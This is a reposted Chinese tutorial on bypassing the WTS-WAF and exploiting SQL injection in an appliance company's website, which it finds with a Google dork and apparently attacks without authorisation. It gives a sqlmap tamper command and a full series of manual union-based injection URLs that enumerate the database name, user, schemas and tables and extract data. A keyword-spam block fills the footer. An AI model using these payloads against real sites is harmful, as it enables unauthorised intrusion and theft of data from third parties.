千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 网络安全 >

如何进行绕过WTS-WAF的分析

发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,本篇文章为大家展示了如何进行绕过WTS-WAF的分析,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。0x01.寻找目标inurl:.php?id= intext
千家信息网最后更新 2025年12月01日如何进行绕过WTS-WAF的分析

本篇文章为大家展示了如何进行绕过WTS-WAF的分析,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。


0x01.寻找目标

inurl:.php?id= intext:电器

找到了一个电器公司的网站,随便测了测,发现有waf

这还不安排(找了点资料,貌似直接加号代替空格就可以,直接尝试)

0x02.操作

发现没有waf拦截了

资料还说了

sqlmap.py -u http://*/*.php?id=29 --tables --tamper space2plus.py

工具我尝试了发现无法开始

就这样子......

0x03.手注

http://*/*.php?id=1+and+1=1  #回显正常http://*/*.php?id=1+and+1=2  #回显错误说明存在注入http://*/*.php?id=1+order+by+15  #15回显错误http://*/*.php?id=1+order+by+14  #14回显正常说明有14个字段http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14  #-1让它错误然后执行后面

它回显了第2和第8

http://*/*.php?id=-1+union+select+1,database(),3,4,5,6,7,user(),9,10,11,12,13,14  #查询当前数据库信息和当前用户一些常见的函数version()  #显示数据库当前版本database() / schema()  #显示当前数据库名user() / system_user() / session_user() / current_user() / current_user()  #显示当前用户名称charset(str)  #返回字符串str的字符集collation(str)  #返回字符串str的字符排列方式

0x04.查数据

爆数据库

http://*/*.php?id=-1+union+select+1,group_concat(schema_name),3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1

它不能group_concat,那我就一个一个查了!http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1 #从1开始取一个http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+1,1  #从2开始取一个

爆数据表

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1

爆数据

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,字段名,9,10,11,12,13,14+表名+limit+0,1

总结:

1.工具跑不起就只能手注了

2.实践了下mysql的手注

上述内容就是如何进行绕过WTS-WAF的分析,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注行业资讯频道。

很赞哦!
数据 字符 数据库 错误 分析 内容 字段 字符串 工具 技能 用户 电器 知识 资料 尝试 简明 简明扼要 信息 公司 函数 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 昆药集团网络安全 打印机代理服务器怎样设置 清华同方数据库专利 华为网络安全宣传动画视频 杨浦区合格软件开发 学软件开发需要哪些条件 选择数据库应使用的命令 网络安全系统标书 软件开发晋升空间 路径 花生壳服务器地址和域名 服务器进入anaconda环境 金仓数据库市场前景 数据库 字段名称 中文 张家港软件开发公司哪个最好 云服务器公网ip安全吗 驰速软件开发公司 bs程序服务器配置 赵志宏网络安全 智能互联网络技术要学什么 数据库原理与应用教案 保山软件开发排名 工作中如果做好网络安全 数据库怎样把横表变成竖表 融思网络安全大赛2019 网络安全科技能力 北京企业软件开发高品质的选择 基于平台的软件开发 辽宁上门软件开发中心 d网络安全靠大家手抄报 方中天网络技术账号

相关文章

0